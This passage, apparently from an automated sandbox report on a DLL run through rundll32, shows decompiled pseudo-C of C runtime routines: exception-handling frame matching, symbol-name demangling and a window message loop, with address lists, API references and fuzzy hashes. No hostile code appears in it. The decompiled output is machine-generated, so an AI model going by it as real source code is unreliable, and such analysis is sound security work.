																					E10005D39(_t306, _t274, _a8, _v12, _a16, _a20,  &_v88,  *_t321,  &_v108, _a28, _a32);
																					_t338 = _t338 + 0x30;
																				}
																				L45:
																				_t303 = _v20;
																				goto L46;
																				L42:
																				_t298 = _t298 + 1;
																				_t259 = _t259 + 0x10;
																				_v24 = _t298;
																				_v28 = _t259;
																				__eflags = _t298 - _v96;
																			} while (_t298 != _v96);
																			goto L45;
																		}
																	}
																}
																L46:
																_t303 = _t303 + 1;
																_t252 = _v48;
																_t294 = _v36 + 0x14;
																_v20 = _t303;
																_v36 = _t294;
																__eflags = _t303 - _v60;
															} while (_t303 < _v60);
															_t308 = _a20;
															_t322 = 0;
															__eflags = 0;
														}
													}
													__eflags = _a24;
													if(_a24 != 0) {
														_push(1);
														E1000544E();
														_t279 = _t274;
													}
													__eflags = _v5;
													if(_v5 != 0) {
														L62:
														_t226 = E10005A3D(_t274, _t279, _t303, _t322);
														__eflags =  *((intOrPtr*)(_t226 + 0x1c)) - _t322;
														if( *((intOrPtr*)(_t226 + 0x1c)) != _t322) {
															goto L69;
														} else {
															goto L63;
														}
													} else {
														__eflags = ( *_t308 & 0x1fffffff) - 0x19930521;
														if(( *_t308 & 0x1fffffff) < 0x19930521) {
															goto L62;
														} else {
															__eflags = _t308[7];
															if(_t308[7] != 0) {
																L55:
																_t230 = _t308[8] >> 2;
																__eflags = _t230 & 0x00000001;
																if((_t230 & 0x00000001) == 0) {
																	_push(_t308[7]);
																	_t231 = E100068F0(_t274);
																	_pop(_t279);
																	__eflags = _t231;
																	if(_t231 == 0) {
																		goto L66;
																	} else {
																		goto L62;
																	}
																} else {
																	 *(E10005A3D(_t274, _t279, _t303, _t322) + 0x10) = _t274;
																	_t240 = E10005A3D(_t274, _t279, _t303, _t322);
																	_t290 = _v12;
																	 *((intOrPtr*)(_t240 + 0x14)) = _v12;
																	goto L64;
																}
															} else {
																_t247 = _t308[8] >> 2;
																__eflags = _t247 & 0x00000001;
																if((_t247 & 0x00000001) == 0) {
																	goto L62;
																} else {
																	__eflags = _a28;
																	if(_a28 != 0) {
																		goto L62;
																	} else {
																		goto L55;
																	}
																}
															}
														}
													}
												} else {
													__eflags = _t274[0x14] - 0x19930521;
													if(_t274[0x14] == 0x19930521) {
														goto L31;
													} else {
														__eflags = _t274[0x14] - 0x19930522;
														if(_t274[0x14] != 0x19930522) {
															goto L59;
														} else {
															goto L31;
														}
													}
												}
											}
										}
									} else {
										_v20 =  *((intOrPtr*)(E10005A3D(_t274, _t279, _t303, _t322) + 0x1c));
										_t270 = E10005A3D(_t274, _t279, _t303, _t322);
										_push(_v20);
										 *(_t270 + 0x1c) = _t322;
										_t271 = E100068F0(_t274);
										_pop(_t290);
										if(_t271 != 0) {
											goto L25;
										} else {
											_t308 = _v20;
											_t359 =  *_t308 - _t322;
											if( *_t308 <= _t322) {
												L64:
												E1001200F(_t274, _t290, _t303, __eflags);
											} else {
												_t300 = _t322;
												_v20 = _t322;
												while(E100064CB( *((intOrPtr*)(_t300 + _t308[1] + 4)), _t359, 0x1004da94) == 0) {
													_t322 = _t322 + 1;
													_t290 = _v20 + 0x10;
													_v20 = _v20 + 0x10;
													_t359 = _t322 -  *_t308;
													if(_t322 >=  *_t308) {
														goto L64;
													} else {
														continue;
													}
													goto L65;
												}
											}
											L65:
											_push(1);
											_push(_t274);
											E1000544E();
											_t279 =  &_v68;
											E1000647B( &_v68);
											E10004C0B( &_v68, 0x1004b054);
											L66:
											 *(E10005A3D(_t274, _t279, _t303, _t322) + 0x10) = _t274;
											_t233 = E10005A3D(_t274, _t279, _t303, _t322);
											_t279 = _v12;
											 *(_t233 + 0x14) = _v12;
											_t234 = _a32;
											__eflags = _t234;
											if(_t234 == 0) {
												_t234 = _a8;
											}
											E10004E9B(_t279, _t234, _t274);
											E100067E5(_a8, _a16, _t308);
											_t237 = E10006A10(_t308);
											_t338 = _t338 + 0x10;
											_push(_t237);
											E1000675C(_t274, _t279, _t303, _t308, _t322, __eflags);
											goto L69;
										}
									}
								}
							}
						}
					}
				}
			}

0x10005db9
0x10005db9
0x10005dc0
0x10005dc2
0x10005dcb
0x10005dd1
0x10005dd4
0x10005dd9
0x10005ddc
0x10005de2
0x10006169
0x10006169
0x1000616e
0x10006170
0x10006172
0x10006175
0x10006176
0x10006179
0x1000617f
0x1000629e
0x10006185
0x10006185
0x10006186
0x10006187
0x1000618e
0x10006191
0x10006194
0x1000619a
0x1000619c
0x100061a1
0x100061a4
0x100061a6
0x100061ac
0x100061ae
0x100061b4
0x100061c9
0x100061ce
0x100061d1
0x100061d3
0x1000629a
0x00000000
0x1000629b
0x100061d3
0x100061b4
0x100061ac
0x100061a4
0x100061d9
0x100061dc
0x100061df
0x100061e2
0x100061e5
0x100061eb
0x100061fd
0x10006202
0x10006205
0x10006208
0x1000620b
0x1000620e
0x10006211
0x10006214
0x00000000
0x00000000
0x1000621a
0x1000621a
0x1000621d
0x10006220
0x1000622f
0x10006230
0x10006230
0x10006232
0x10006235
0x00000000
0x00000000
0x10006237
0x1000623a
0x00000000
0x00000000
0x10006248
0x1000624a
0x1000624d
0x1000624f
0x10006257
0x10006257
0x1000625a
0x1000625c
0x1000625e
0x1000627a
0x1000627f
0x10006282
0x10006282
0x00000000
0x1000625a
0x10006251
0x10006255
0x00000000
0x00000000
0x00000000
0x10006285
0x10006288
0x10006289
0x1000628c
0x1000628f
0x10006292
0x10006295
0x10006295
0x00000000
0x10006220
0x1000629f
0x100062a4
0x100062a5
0x100062a8
0x100062ab
0x100062ac
0x100062ad
0x100062ae
0x100062b1
0x100062b3
0x1000632b
0x1000632d
0x1000632d
0x100062b5
0x100062b5
0x100062b8
0x100062bb
0x00000000
0x100062bd
0x100062bd
0x100062c0
0x100062c3
0x100062ca
0x100062ca
0x100062cd
0x100062cf
0x100062d1
0x10006303
0x10006303
0x10006306
0x1000630d
0x1000630d
0x10006310
0x10006313
0x1000631a
0x1000631a
0x1000631d
0x10006324
0x10006326
0x10006326
0x1000631f
0x1000631f
0x10006322
0x00000000
0x00000000
0x10006322
0x10006315
0x10006315
0x10006318
0x00000000
0x00000000
0x10006318
0x10006308
0x10006308
0x1000630b
0x00000000
0x00000000
0x1000630b
0x10006327
0x100062d3
0x100062d3
0x100062d3
0x100062d6
0x100062d6
0x100062d8
0x100062da
0x00000000
0x00000000
0x100062dc
0x100062de
0x100062f2
0x100062f2
0x100062e0
0x100062e0
0x100062e3
0x100062e6
0x00000000
0x100062e8
0x100062e8
0x100062eb
0x100062ee
0x100062f0
0x00000000
0x00000000
0x00000000
0x00000000
0x100062f0
0x100062e6
0x100062fb
0x100062fb
0x100062fd
0x00000000
0x100062ff
0x100062ff
0x100062ff
0x00000000
0x100062fd
0x100062f6
0x100062f8
0x100062f8
0x00000000
0x100062f8
0x100062c5
0x100062c5
0x100062c8
0x00000000
0x00000000
0x00000000
0x00000000
0x100062c8
0x100062c3
0x100062bb
0x1000632e
0x10006332
0x10006332
0x10005df1
0x10005df1
0x10005dfa
0x10005efc
0x10005efc
0x00000000
0x10005e29
0x10005e29
0x10005e2e
0x10005efe
0x10005efe
0x10005f01
0x00000000
0x10005e34
0x10005e34
0x10005e3c
0x10006100
0x10006104
0x10005e42
0x10005e47
0x10005e4a
0x10005e4f
0x10005e56
0x10005e5b
0x00000000
0x10005e93
0x10005e9b
0x10005f06
0x10005f06
0x10005f09
0x10005f0c
0x10005f0c
0x10005f0f
0x10005f12
0x10005f18
0x100060cf
0x100060cf
0x100060d2
0x00000000
0x100060d4
0x100060d4
0x100060d8
0x00000000
0x100060de
0x100060de
0x100060e1
0x100060e4
0x100060e5
0x100060e6
0x100060e9
0x100060ea
0x100060ed
0x100060ee
0x100060f3
0x00000000
0x100060f3
0x100060d8
0x10005f1e
0x10005f1e
0x10005f22
0x00000000
0x10005f28
0x10005f28
0x10005f2f
0x10005f47
0x10005f47
0x10005f4a
0x10005f50
0x10005f60
0x10005f65
0x10005f68
0x10005f6b
0x10005f6e
0x10005f71
0x10005f74
0x10005f77
0x10005f7d
0x10005f7d
0x10005f80
0x10005f83
0x10005f92
0x10005f93
0x10005f93
0x10005f95
0x10005f98
0x10005f9e
0x10005fa1
0x10005fa7
0x10005fa9
0x10005fac
0x10005faf
0x10005fb8
0x10005fbb
0x10005fbd
0x10005fbd
0x10005fc0
0x10005fc3
0x10005fc6
0x10005fc9
0x10005fcc
0x10005fd1
0x10005fd2
0x10005fd3
0x10005fd4
0x10005fd5
0x10005fd8
0x10005fda
0x10005fdc
0x00000000
0x10005fde
0x10005fde
0x10005fde
0x10005fe1
0x10005fe4
0x10005fe6
0x10005fe7
0x10005fec
0x10005fef
0x10005ff1
0x00000000
0x00000000
0x10005ff3
0x10005ff4
0x10005ff7
0x10005ff9
0x00000000
0x10005ffb
0x10005ffb
0x10005ffe
0x10006001
0x00000000
0x10006001
0x00000000
0x10005ff9
0x10006015
0x1000601b
0x1000601f
0x1000603c
0x10006041
0x10006041
0x10006044
0x10006044
0x00000000
0x10006004
0x10006004
0x10006005
0x10006008
0x1000600b
0x1000600e
0x1000600e
0x00000000
0x10006013
0x10005faf
0x10005fa1
0x10006047
0x1000604a
0x1000604b
0x1000604e
0x10006051
0x10006054
0x10006057
0x10006057
0x10006060
0x10006063
0x10006063
0x10006063
0x10005f77
0x10006065
0x10006069
0x1000606b
0x1000606e
0x10006074
0x10006074
0x10006075
0x10006079
0x100060f6
0x100060f6
0x100060fb
0x100060fe
0x00000000
0x00000000
0x00000000
0x00000000
0x1000607b
0x10006082
0x10006087
0x00000000
0x10006089
0x10006089
0x1000608d
0x1000609f
0x100060a2
0x100060a5
0x100060a7
0x100060be
0x100060c2
0x100060c8
0x100060c9
0x100060cb
0x00000000
0x100060cd
0x00000000
0x100060cd
0x100060a9
0x100060ae
0x100060b1
0x100060b6
0x100060b9
0x00000000
0x100060b9
0x1000608f
0x10006092
0x10006095
0x10006097
0x00000000
0x10006099
0x10006099
0x1000609d
0x00000000
0x00000000
0x00000000
0x00000000
0x1000609d
0x10006097
0x1000608d
0x10006087
0x10005f31
0x10005f31
0x10005f38
0x00000000
0x10005f3a
0x10005f3a
0x10005f41
0x00000000
0x00000000
0x00000000
0x00000000
0x10005f41
0x10005f38
0x10005f2f
0x10005f22
0x10005e9d
0x10005ea5
0x10005ea8
0x10005ead
0x10005eb1
0x10005eb4
0x10005eba
0x10005ebd
0x00000000
0x10005ebf
0x10005ebf
0x10005ec2
0x10005ec4
0x10006105
0x10006105
0x10005eca
0x10005eca
0x10005ecc
0x10005ecf
0x10005eeb
0x10005eec
0x10005eef
0x10005ef2
0x10005ef4
0x00000000
0x10005efa
0x00000000
0x10005efa
0x00000000
0x10005ef4
0x10005ecf
0x1000610a
0x1000610a
0x1000610c
0x1000610d
0x10006114
0x10006117
0x10006125
0x1000612a
0x1000612f
0x10006132
0x10006137
0x1000613a
0x1000613d
0x10006140
0x10006142
0x10006144
0x10006144
0x10006149
0x10006155
0x1000615b
0x10006160
0x10006163
0x10006164
0x00000000
0x10006164
0x10005ebd
0x10005e9b
0x10005e5b
0x10005e3c
0x10005e2e
0x10005dfa

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 10005EB4
type_info::operator==.LIBVCRUNTIME ref: 10005EDB
___TypeMatch.LIBVCRUNTIME ref: 10005FE7
IsInExceptionSpec.LIBVCRUNTIME ref: 100060C2
_UnwindNestedFrames.LIBCMT ref: 10006149
CallUnexpected.LIBVCRUNTIME ref: 10006164

Strings

csm, xrefs: 10005F12
csm, xrefs: 10005DF4
csm, xrefs: 10005E61

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 7d246a1fdf75e9af7c05d0d311cdd578202093742d17d7a48fe81ccd6d4acd59
Instruction ID: db32c1024e391476e5cdf26b8d57ef01a1901657407386c4c16bdeae4e47b44c
Opcode Fuzzy Hash: 7d246a1fdf75e9af7c05d0d311cdd578202093742d17d7a48fe81ccd6d4acd59
Instruction Fuzzy Hash: 91C18E7590024ADFEF15CF94C88099FBBB6FF08395F214569F8056B20AD732EA51CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1000CF24, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 180
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E1000CF24(void* __edx, char** _a4, char _a8, char _a12) {
				signed int _v8;
				char _v24;
				char* _v28;
				char* _v32;
				char _v33;
				char _v44;
				char** _v48;
				char _v56;
				char _v64;
				void* __ebp;
				signed int _t50;
				char** _t56;
				char** _t57;
				char** _t59;
				char* _t65;
				char** _t76;
				intOrPtr* _t77;
				intOrPtr _t78;
				char** _t82;
				char* _t83;
				char _t84;
				signed int* _t112;
				char* _t115;
				intOrPtr* _t117;
				signed int* _t118;
				intOrPtr _t120;
				intOrPtr* _t121;
				signed int _t123;

				_t113 = __edx;
				_t50 =  *0x1004d054; // 0x944e5696
				_v8 = _t50 ^ _t123;
				_t82 = _a4;
				_t117 =  *0x1004e004; // 0x0
				_v48 = _t82;
				_t84 =  *_t117;
				_t53 = _t84 + 0xffffffd0;
				_v33 = _t84;
				if(_t84 + 0xffffffd0 > 9) {
					if(_t84 != 0x3f) {
						if(E1000D3E3(_t117, "template-parameter-", 0x13) != 0) {
							if(E1000D3E3(_t117, "generic-type-", 0xd) != 0) {
								if(_a12 == 0 || _v33 != 0x40) {
									_t56 = E100071BE( &_v56, 0x1004e004, 0x40);
									L20:
									_t83 = _t56[1];
									_t115 =  *_t56;
								} else {
									_t115 = 0;
									_t83 = 0;
									 *0x1004e004 = _t117 + 1;
								}
								goto L21;
							}
							_v32 = "`generic-type-";
							_t120 = _t117 + 0xd;
							_v28 = 0xe;
							L9:
							 *0x1004e004 = _t120;
							E1000BC98(_t113,  &_v44);
							if(( *0x1004e00c & 0x00004000) == 0 ||  *0x1004e014 == 0) {
								E100076A6(E1000723E( &_v56,  &_v32),  &_v32,  &_v44);
								_t65 =  &_v64;
								goto L14;
							} else {
								E1000BD27( &_v44,  &_v24, 0x10);
								_t121 =  *0x1004e014; // 0x0
								 *0x1004223c(E10010036( &_v44,  &_v24));
								if( *_t121() == 0) {
									E100076A6(E1000723E( &_v64,  &_v32),  &_v32,  &_v44);
									_t65 =  &_v56;
									L14:
									_t56 = E100076C8( &_v32, _t65, 0x27);
									goto L20;
								}
								_v28 = 0;
								_push(_v28);
								_t56 = E10006E34( &_v44, _t71);
								goto L20;
							}
						}
						_v32 = "`template-parameter-";
						_t120 = _t117 + 0x13;
						_v28 = 0x14;
						goto L9;
					} else {
						_t76 = E1000C18C(__edx,  &_v44, 0);
						_t115 =  *_t76;
						_t83 = _t76[1];
						_t77 =  *0x1004e004; // 0x0
						_v32 = _t115;
						_v28 = _t83;
						_t78 = _t77 + 1;
						 *0x1004e004 = _t78;
						if( *_t77 != 0x40) {
							_t79 = _t78 - 1;
							 *0x1004e004 = _t78 - 1;
							E10007596( &_v32, (0 |  *_t79 != 0x00000000) + 1);
							_t83 = _v28;
							_t115 = _v32;
						}
						L21:
						if(_a8 != 0) {
							_t118 =  *0x1004dffc; // 0x0
							if( *_t118 != 9 && _t115 != 0) {
								_t59 = E1000A9CF(0x1004e020, 8);
								if(_t59 != 0) {
									 *_t59 = _t115;
									_t59[1] = _t83;
									 *_t118 =  *_t118 + 1;
									 *(_t118 + 4 +  *_t118 * 4) = _t59;
								}
							}
						}
						_t57 = _v48;
						 *_t57 = _t115;
						_t57[1] = _t83;
						goto L27;
					}
				} else {
					_t112 =  *0x1004dffc; // 0x0
					 *0x1004e004 = _t117 + 1;
					E100075C8(_t112, _t82, _t53);
					_t57 = _t82;
					L27:
					return E100037EA(_t57, _v8 ^ _t123, _t113);
				}
			}

0x1000cf24
0x1000cf2a
0x1000cf31
0x1000cf35
0x1000cf39
0x1000cf3f
0x1000cf42
0x1000cf47
0x1000cf4a
0x1000cf50
0x1000cf71
0x1000cfd5
0x1000cffc
0x1000d0c7
0x1000d0e6
0x1000d0eb
0x1000d0eb
0x1000d0ee
0x1000d0cf
0x1000d0cf
0x1000d0d2
0x1000d0d4
0x1000d0d4
0x00000000
0x1000d0c7
0x1000d002
0x1000d009
0x1000d00c
0x1000d013
0x1000d016
0x1000d01d
0x1000d02d
0x1000d0b9
0x1000d0be
0x00000000
0x1000d038
0x1000d041
0x1000d046
0x1000d059
0x1000d064
0x1000d08e
0x1000d093
0x1000d096
0x1000d09c
0x00000000
0x1000d09c
0x1000d066
0x1000d06d
0x1000d071
0x00000000
0x1000d071
0x1000d02d
0x1000cfd7
0x1000cfde
0x1000cfe1
0x00000000
0x1000cf73
0x1000cf79
0x1000cf80
0x1000cf82
0x1000cf85
0x1000cf8a
0x1000cf8d
0x1000cf92
0x1000cf93
0x1000cf9b
0x1000cfa1
0x1000cfa4
0x1000cfb3
0x1000cfb8
0x1000cfbb
0x1000cfbb
0x1000d0f0
0x1000d0f4
0x1000d0f6
0x1000d0ff
0x1000d10c
0x1000d113
0x1000d115
0x1000d117
0x1000d11a
0x1000d11e
0x1000d11e
0x1000d113
0x1000d0ff
0x1000d122
0x1000d125
0x1000d127
0x00000000
0x1000d12a
0x1000cf52
0x1000cf52
0x1000cf5b
0x1000cf61
0x1000cf66
0x1000d12b
0x1000d138
0x1000d138

APIs

Replicator::operator[].LIBVCRUNTIME ref: 1000CF61
DName::operator=.LIBVCRUNTIME ref: 1000CFB3

Strings

template-parameter-, xrefs: 1000CFC5
generic-type-, xrefs: 1000CFEC
@, xrefs: 1000D0C9

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Name::operator=Replicator::operator[]
String ID: @$generic-type-$template-parameter-
API String ID: 3211817929-1320211309
Opcode ID: 138bd7d1e047c867c0a897e6d0aad874662d5c1623397badb2a104a952a59643
Instruction ID: e026a952384d41eb90ae7b1f9d44a7b3bc4911ee2c14a530ba52aab493f896e0
Opcode Fuzzy Hash: 138bd7d1e047c867c0a897e6d0aad874662d5c1623397badb2a104a952a59643
Instruction Fuzzy Hash: 48611771D002499FEB10DF54D985BEEBBF8EF09380F10801AE605E7295DB74AD45CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 1000218B, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 75
windowregistryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000218B(void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a16) {
				struct tagMSG _v32;
				struct _WNDCLASSEXA _v80;
				void* _t26;
				struct HINSTANCE__* _t39;

				_t39 = _a4;
				LoadStringA(_t39, 0x82, 0x1004db68, 0x64);
				LoadStringA(_t39, 0x81, 0x1004dbd0, 0x64);
				_v80.cbSize = 0x30;
				_v80.style = 3;
				_v80.lpfnWndProc = E10001AC4;
				_v80.cbClsExtra = 0;
				_v80.cbWndExtra = 0;
				_v80.hInstance = _t39;
				_v80.hIcon = 0;
				_v80.hCursor = LoadCursorA(0, 0x7f00);
				_v80.hbrBackground = 6;
				_v80.lpszMenuName = 0x81;
				_v80.lpszClassName = 0x1004dbd0;
				_v80.hIconSm = 0;
				RegisterClassExA( &_v80);
				_t26 = E100012B1(_t39, _a16);
				if(_t26 != 0) {
					if(GetMessageA( &_v32, 0, 0, 0) == 0) {
						L4:
						return _v32.wParam;
					}
					do {
						TranslateMessage( &_v32);
						DispatchMessageA( &_v32);
					} while (GetMessageA( &_v32, 0, 0, 0) != 0);
					goto L4;
				}
				return _t26;
			}

0x1000219a
0x100021aa
0x100021ba
0x100021be
0x100021cb
0x100021d2
0x100021d9
0x100021dc
0x100021df
0x100021e2
0x100021eb
0x100021f2
0x100021f9
0x100021fc
0x10002203
0x10002206
0x10002210
0x10002219
0x1000222c
0x10002251
0x00000000
0x10002251
0x10002230
0x10002234
0x1000223e
0x1000224d
0x00000000
0x10002230
0x10002258

APIs

LoadStringA.USER32 ref: 100021AA
LoadStringA.USER32 ref: 100021BA
LoadCursorA.USER32 ref: 100021E5
RegisterClassExA.USER32 ref: 10002206

Part of subcall function 100012B1: GetVersionExA.KERNEL32(?), ref: 100012E0
Part of subcall function 100012B1: CreateWindowExA.USER32 ref: 1000131E
Part of subcall function 100012B1: ShowWindow.USER32(00000000,?), ref: 1000132E
Part of subcall function 100012B1: UpdateWindow.USER32 ref: 10001335

GetMessageA.USER32 ref: 10002228
TranslateMessage.USER32 ref: 10002234
DispatchMessageA.USER32 ref: 1000223E
GetMessageA.USER32 ref: 1000224B

Strings

0, xrefs: 100021BE

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Message$LoadWindow$String$ClassCreateCursorDispatchRegisterShowTranslateUpdateVersion
String ID: 0
API String ID: 1669850144-4108050209
Opcode ID: 1c36e70d199e3722fff3a6eed99da0b3f5838ac0bb385f56671e7e76504a532a
Instruction ID: 6fe8cfb5187b65730e66161c813667806370dfcb888eacca90ee75b3e607f7b9
Opcode Fuzzy Hash: 1c36e70d199e3722fff3a6eed99da0b3f5838ac0bb385f56671e7e76504a532a
Instruction Fuzzy Hash: 0721F872D01229AAEB11DFA5DE84EDFBBBCEF49754F11401AF600F2140D7B99902CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 10008D42, Relevance: 15.3, APIs: 10, Instructions: 338
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10008D42(signed int* _a4, signed int* _a8) {
				signed char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char* _v24;
				signed int _v28;
				signed int _v32;
				void* __ebx;
				intOrPtr* _t134;
				signed int* _t136;
				signed char _t141;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t155;
				signed int* _t159;
				signed int* _t160;
				signed int _t161;
				signed char _t180;
				signed int _t181;
				signed int* _t187;
				signed int _t188;
				signed int _t189;
				void* _t197;
				signed int _t203;
				void* _t204;
				void* _t205;
				void* _t206;
				void* _t207;
				void* _t208;
				signed char _t210;
				signed char _t211;
				signed int _t221;
				intOrPtr _t226;
				intOrPtr* _t228;
				signed int _t229;
				void* _t232;
				signed int _t234;
				void* _t244;

				_t134 =  *0x1004e004; // 0x0
				_t211 =  *_t134;
				if(_t211 == 0) {
					E10007662(_t211, _a4, 1, _a8);
					L93:
					_t136 = _a4;
					L94:
					return _t136;
				}
				_v16 = _v16 & 0x00000000;
				_t3 = _t134 + 1; // 0x1
				_t228 = _t3;
				_v12 = _v12 & 0x00000000;
				_t203 = _t211 & 0x000000ff;
				 *0x1004e004 = _t228;
				_t232 = 2;
				_t244 = _t203 - 0x4e;
				if(_t244 > 0) {
					__eflags = _t203 - 0x4f;
					if(__eflags == 0) {
						_v32 = "long ";
						_v28 = 5;
						E10007500( &_v16,  &_v32);
						L79:
						_v32 = "double";
						_t213 =  &_v16;
						_v28 = 6;
						E10007748( &_v16,  &_v32);
						L80:
						_t141 = 0;
						_t204 = _t203 - 0x43;
						if(_t204 == 0) {
							_v32 = "signed ";
							_v28 = 7;
							L88:
							_t213 = E1000723E( &_v24,  &_v32);
							E100076A6(_t143,  &_v32,  &_v16);
							_v16 = _v32;
							_v12 = _v28;
							L89:
							_t147 = _a8;
							if( *_a8 != 0) {
								E100077A0( &_v16, E10007637(_t213,  &_v32, 0x20, _t147));
							}
							_t136 = _a4;
							 *_t136 = _v16;
							_t136[1] = _v12;
							goto L94;
						}
						_t205 = _t204 - _t232;
						if(_t205 == 0) {
							L33:
							_v32 = "unsigned ";
							_v28 = 9;
							goto L88;
						}
						_t206 = _t205 - _t232;
						if(_t206 == 0) {
							goto L33;
						}
						_t207 = _t206 - _t232;
						if(_t207 == 0) {
							goto L33;
						}
						_t208 = _t207 - _t232;
						if(_t208 == 0) {
							goto L33;
						}
						if(_t208 != 0x14) {
							goto L89;
						}
						L28:
						_t152 = (_t141 & 0x000000ff) - 0x45;
						if(_t152 == 0) {
							goto L33;
						}
						_t153 = _t152 - _t232;
						if(_t153 == 0) {
							goto L33;
						}
						_t154 = _t153 - _t232;
						if(_t154 == 0) {
							goto L33;
						}
						_t155 = _t154 - _t232;
						if(_t155 == 0 || _t155 == _t232) {
							goto L33;
						} else {
							goto L89;
						}
					}
					if(__eflags <= 0) {
						L76:
						 *0x1004e004 = _t228 - 1;
						_t159 = E10009F87( &_v32);
						_t213 =  *_t159;
						_t229 = _t159[1];
						_v16 = _t213;
						_v12 = _t229;
						__eflags = _t213;
						if(_t213 != 0) {
							goto L80;
						}
						L59:
						_t136 = _a4;
						 *_t136 = _t213;
						_t136[1] = _t229;
						goto L94;
					}
					__eflags = _t203 - 0x53;
					if(_t203 <= 0x53) {
						_t210 = _t203 & 0x00000003;
						__eflags = _t210;
						L65:
						_t160 = _a8;
						_v16 = _v16 & 0x00000000;
						_v12 = _v12 & 0x00000000;
						_t221 =  *_t160;
						_t161 = _t160[1];
						_v32 = _t221;
						_v28 = _t161;
						__eflags = _t210 - 0xfffffffe;
						if(_t210 != 0xfffffffe) {
							__eflags = _t221;
							if(_t221 == 0) {
								_t234 = _t210 & 0x00000002;
								__eflags = _t210 & 0x00000001;
								if((_t210 & 0x00000001) == 0) {
									__eflags = _t234;
									if(_t234 != 0) {
										_v24 = "volatile";
										_v20 = 8;
										E10007500( &_v16,  &_v24);
									}
								} else {
									_v24 = "const";
									_v20 = 5;
									E10007500( &_v16,  &_v24);
									__eflags = _t234;
									if(_t234 != 0) {
										_v24 = " volatile";
										_v20 = 9;
										E10007748( &_v16,  &_v24);
									}
								}
							}
							E1000B576(_t210, _a4,  &_v16,  &_v32, 1);
							goto L93;
						}
						_v28 = _t161 | 0x00000800;
						E1000B576(_t210,  &_v24,  &_v16,  &_v32, 0);
						_t229 = _v20;
						__eflags = 0x00000800 & _t229;
						if((0x00000800 & _t229) == 0) {
							_v32 = 0x10042dd4;
							_v28 = 2;
							E10007748( &_v24,  &_v32);
							_t229 = _v20;
						}
						_t213 = _v24;
						goto L59;
					}
					__eflags = _t203 - 0x58;
					if(_t203 == 0x58) {
						_v32 = "void";
						_v28 = 4;
						L12:
						_t213 =  &_v16;
						E10007500( &_v16,  &_v32);
						goto L89;
					}
					__eflags = _t203 - 0x5f;
					if(_t203 != 0x5f) {
						goto L76;
					}
					_t180 =  *_t228;
					_t23 = _t228 + 1; // 0x2
					_t226 = _t23;
					_v5 = _t180;
					_t181 = _t180 & 0x000000ff;
					 *0x1004e004 = _t226;
					__eflags = _t181 - 0x4e;
					if(__eflags > 0) {
						__eflags = _t181 - 0x53;
						if(__eflags > 0) {
							__eflags = _t181 - 0x55;
							if(_t181 == 0x55) {
								_v32 = "char32_t";
								L42:
								_v28 = 8;
								L26:
								_t213 =  &_v16;
								E10007500( &_v16,  &_v32);
								L27:
								_t141 = _v5;
								goto L28;
							}
							__eflags = _t181 - 0x57;
							if(_t181 == 0x57) {
								_v32 = "wchar_t";
								L37:
								_v28 = 7;
								goto L26;
							}
							__eflags = _t181 + 0xffffffa8 - 1;
							if(_t181 + 0xffffffa8 > 1) {
								L60:
								_v32 = "UNKNOWN";
								goto L37;
							}
							_t51 = _t226 - 1; // 0x1
							 *0x1004e004 = _t51;
							_t187 = E10009F87( &_v32);
							_t213 =  *_t187;
							_t229 = _t187[1];
							_v16 = _t213;
							_v12 = _t229;
							__eflags = _t213;
							if(_t213 != 0) {
								goto L27;
							}
							goto L59;
						}
						if(__eflags == 0) {
							_v32 = "char16_t";
							goto L42;
						}
						_t188 = _t181 - 0x4f;
						__eflags = _t188;
						if(_t188 == 0) {
							_t210 = 0xfffffffe;
							goto L65;
						}
						_t189 = _t188 - _t232;
						__eflags = _t189;
						if(_t189 == 0) {
							_v32 = "char8_t";
							goto L37;
						}
						__eflags = _t189 != 1;
						if(_t189 != 1) {
							goto L60;
						}
						_v32 = "<unknown>";
						_v28 = 9;
						goto L26;
					}
					if(__eflags == 0) {
						_v32 = "bool";
						_v28 = 4;
						goto L26;
					}
					__eflags = _t181 - 0x47;
					if(_t181 > 0x47) {
						__eflags = _t181 - 0x49;
						if(_t181 <= 0x49) {
							_v32 = "__int32";
							goto L37;
						}
						__eflags = _t181 - 0x4b;
						if(_t181 <= 0x4b) {
							_v32 = "__int64";
							goto L37;
						}
